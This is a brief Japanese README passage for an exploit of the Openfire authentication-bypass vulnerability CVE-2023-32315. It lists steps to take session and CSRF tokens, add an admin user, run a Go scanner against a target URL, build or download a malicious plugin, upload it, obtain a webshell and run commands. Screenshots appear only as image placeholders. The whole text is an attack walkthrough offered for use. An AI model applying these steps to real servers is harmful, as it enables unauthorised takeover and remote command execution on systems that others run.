
0x01 返されたJSESSIONIDとcsrftokenを取得し、リクエストパケットを構築してユーザーを追加(JSESSIONID、csrftokenを置き換える) img.png
cd CVE-2023-32315-Openfire-Bypass/scan_all
go mod tidy
go run main.go -u http://openfire.com:9090
0x02 プラグインのコンパイルとインストール
mvn clean package
または リリースからプラグインをダウンロード
0x03 プラグインをアップロード img.png
0x04 webshellを取得 img.png 0x05 コマンドを実行 img.png